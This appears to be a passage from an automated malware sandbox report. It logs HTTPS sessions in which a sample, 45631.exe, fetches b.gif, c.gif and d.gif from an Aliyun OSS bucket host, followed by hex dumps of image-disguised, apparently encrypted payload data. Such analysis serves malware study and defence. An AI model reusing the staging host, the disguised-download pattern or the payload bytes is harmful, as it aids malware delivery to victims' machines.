                    Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJLR
                    2025-01-02 11:08:32 UTC4096INData Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19
                    Data Ascii: WUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.54997739.103.20.594435600C:\Users\user\Desktop\45631.exe
                    TimestampBytes transferredDirectionData
                    2025-01-02 11:08:34 UTC111OUTGET /b.gif HTTP/1.1
                    User-Agent: GetData
                    Host: ry2ihs.oss-cn-beijing.aliyuncs.com
                    Cache-Control: no-cache
                    2025-01-02 11:08:35 UTC546INHTTP/1.1 200 OK
                    Server: AliyunOSS
                    Date: Thu, 02 Jan 2025 11:08:35 GMT
                    Content-Type: image/gif
                    Content-Length: 125333
                    Connection: close
                    x-oss-request-id: 677673B351FCAD33391390F0
                    Accept-Ranges: bytes
                    ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                    Last-Modified: Thu, 02 Jan 2025 10:14:13 GMT
                    x-oss-object-type: Normal
                    x-oss-hash-crc64ecma: 10333201072197591521
                    x-oss-storage-class: Standard
                    x-oss-ec: 0048-00000104
                    Content-Disposition: attachment
                    x-oss-force-download: true
                    Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                    x-oss-server-time: 3
                    2025-01-02 11:08:35 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                    2025-01-02 11:08:35 UTC4096INData Raw: 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 9a
                    Data Ascii: _X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                    2025-01-02 11:08:35 UTC4096INData Raw: 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 dd
                    Data Ascii: mkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                    2025-01-02 11:08:35 UTC4096INData Raw: 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 93
                    Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                    2025-01-02 11:08:35 UTC4096INData Raw: d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 90
                    Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                    2025-01-02 11:08:35 UTC4096INData Raw: 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 a1
                    Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                    2025-01-02 11:08:35 UTC4096INData Raw: 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 b9
                    Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                    2025-01-02 11:08:35 UTC4096INData Raw: 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d ac
                    Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                    2025-01-02 11:08:35 UTC4096INData Raw: 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 14
                    Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                    2025-01-02 11:08:35 UTC4096INData Raw: 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf 52
                    Data Ascii: mHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJR


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.54997839.103.20.594435600C:\Users\user\Desktop\45631.exe
                    TimestampBytes transferredDirectionData
                    2025-01-02 11:08:37 UTC111OUTGET /c.gif HTTP/1.1
                    User-Agent: GetData
                    Host: ry2ihs.oss-cn-beijing.aliyuncs.com
                    Cache-Control: no-cache
                    2025-01-02 11:08:37 UTC545INHTTP/1.1 200 OK
                    Server: AliyunOSS
                    Date: Thu, 02 Jan 2025 11:08:37 GMT
                    Content-Type: image/gif
                    Content-Length: 10681
                    Connection: close
                    x-oss-request-id: 677673B51253C53239215707
                    Accept-Ranges: bytes
                    ETag: "10A818386411EE834D99AE6B7B68BE71"
                    Last-Modified: Thu, 02 Jan 2025 10:14:13 GMT
                    x-oss-object-type: Normal
                    x-oss-hash-crc64ecma: 10287299869673359293
                    x-oss-storage-class: Standard
                    x-oss-ec: 0048-00000104
                    Content-Disposition: attachment
                    x-oss-force-download: true
                    Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                    x-oss-server-time: 8
                    2025-01-02 11:08:37 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                    2025-01-02 11:08:37 UTC4096INData Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39
                    Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
                    2025-01-02 11:08:37 UTC3034INData Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27
                    Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.54997939.103.20.594435600C:\Users\user\Desktop\45631.exe
                    TimestampBytes transferredDirectionData
                    2025-01-02 11:08:38 UTC111OUTGET /d.gif HTTP/1.1
                    User-Agent: GetData
                    Host: ry2ihs.oss-cn-beijing.aliyuncs.com
                    Cache-Control: no-cache
                    2025-01-02 11:08:39 UTC546INHTTP/1.1 200 OK
                    Server: AliyunOSS
                    Date: Thu, 02 Jan 2025 11:08:38 GMT
                    Content-Type: image/gif
                    Content-Length: 3892010
                    Connection: close
                    x-oss-request-id: 677673B6B980BA3738A02D70
                    Accept-Ranges: bytes
                    ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                    Last-Modified: Thu, 02 Jan 2025 10:14:17 GMT
                    x-oss-object-type: Normal
                    x-oss-hash-crc64ecma: 3363616613234190325
                    x-oss-storage-class: Standard
                    x-oss-ec: 0048-00000104
                    Content-Disposition: attachment
                    x-oss-force-download: true
                    Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                    x-oss-server-time: 4
                    2025-01-02 11:08:39 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                    2025-01-02 11:08:39 UTC4096INData Raw: 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 6f
                    Data Ascii: ;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|o
                    2025-01-02 11:08:39 UTC4096INData Raw: a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f 11
                    Data Ascii: V(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                    2025-01-02 11:08:39 UTC4096INData Raw: 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd 